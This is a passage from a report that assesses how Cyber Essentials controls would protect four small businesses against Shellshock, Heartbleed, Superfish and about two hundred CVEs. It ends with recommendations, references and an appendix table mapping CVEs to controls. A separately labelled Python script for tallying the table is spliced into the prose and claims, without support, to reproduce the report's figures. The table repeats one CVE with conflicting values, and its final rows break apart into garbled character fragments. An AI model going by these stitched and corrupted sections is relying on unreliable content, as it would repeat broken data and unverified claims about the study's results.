ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from ‘Shellshock’, as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.
With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.
Heartbleed: The ‘Heartbleed’ bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.
In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.
SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the ‘Superfish’ issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.
Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following ‘normal’ patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope: It is important to consider that the scope of this study covers only internet-based commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.
The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education & Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security through fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations, additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (around 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most commonly used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, isn't necessarily understood by individuals as a tool that greatly improves cyber-security.
Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
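The per-control proportions quoted in this section can be recomputed from rows written in the layout of the Cyber Controls Applicability appendix. The following is an added example, not the report's own analysis code: it parses such rows, tallies outcomes with Cyber Essentials in place, the share of CVEs each control helps with, and how many CVEs apply to each network. The eight SAMPLE_ROWS are a constructed excerpt, and the grouping of labels such as "Strong Passwords" and "Firmware Management" onto control names is an assumption made here.

```python
"""
Added example (not the report's own analysis code): tally mitigation outcomes
and per-control coverage from rows written in the layout of the report's
"Cyber Controls Applicability" appendix.
Row layout: CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
SAMPLE_ROWS is a constructed excerpt; its percentages describe only this excerpt.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

SAMPLE_ROWS = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
"""


def canonical_control(label: str) -> str:
    """Group the appendix's varied wording onto control names (assumed grouping).

    Firmware Management/Updates is treated as Patch Management, password and
    access-policy labels as Access Control, Anti-Malware as Malware Protection.
    Website Blacklisting stays its own label, as the appendix lists it separately.
    """
    label = label.lower()
    if "firewall" in label:
        return "Firewall"
    if "patch" in label or "firmware" in label:
        return "Patch Management"
    if "malware" in label:
        return "Malware Protection"
    if "password" in label or "access" in label:
        return "Access Control"
    if "secure configuration" in label:
        return "Secure Configuration"
    if "blacklist" in label:
        return "Website Blacklisting"
    return label.title()


def parse_row(line: str) -> Tuple[str, List[bool], str, List[str]]:
    """Return (cve, applicability flags for the five networks, outcome with CE, controls)."""
    cols = [c.strip() for c in line.split("|")]
    cve, flags, with_ce = cols[0], cols[1:6], cols[7]
    outcome, _, controls_text = with_ce.partition(" - ")
    # Drop bracketed qualifiers such as "(Secure Browser)" before matching names.
    bare = re.sub(r"\([^)]*\)", "", controls_text)
    controls = set()
    for part in re.split(r",|&", bare):
        name = part.split(" - ")[0].strip()   # "Secure Configuration - no JS" -> base name
        if name:
            controls.add(canonical_control(name))
    return cve, [f.lower() == "y" for f in flags], outcome, sorted(controls)


def tally(rows_text: str) -> Dict[str, object]:
    """Outcomes with CE, share of CVEs each control helps with, and per-network exposure."""
    rows = [parse_row(line) for line in rows_text.splitlines() if line.strip()]
    outcomes = Counter(outcome for _, _, outcome, _ in rows)
    helped: Counter = Counter()
    for _, _, outcome, controls in rows:
        if outcome != "Not Mitigated":   # a control only counts where CE changed the outcome
            helped.update(controls)
    control_share = {c: round(100.0 * n / len(rows), 1) for c, n in helped.items()}
    exposure = [sum(flags[i] for _, flags, _, _ in rows) for i in range(5)]
    return {"outcomes": dict(outcomes), "control_share": control_share, "exposure": exposure}


if __name__ == "__main__":
    for key, value in tally(SAMPLE_ROWS).items():
        print(key, value)
```

Pasting the full appendix into `tally` in place of SAMPLE_ROWS reproduces the report's own per-control figures for the rows it lists.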
Recommendations
To further improve cyber-security across the UK, we recommend that:
1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.
2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.
3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] Department for Business, Innovation and Skills, CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, and Government Communications Headquarters. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Websi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
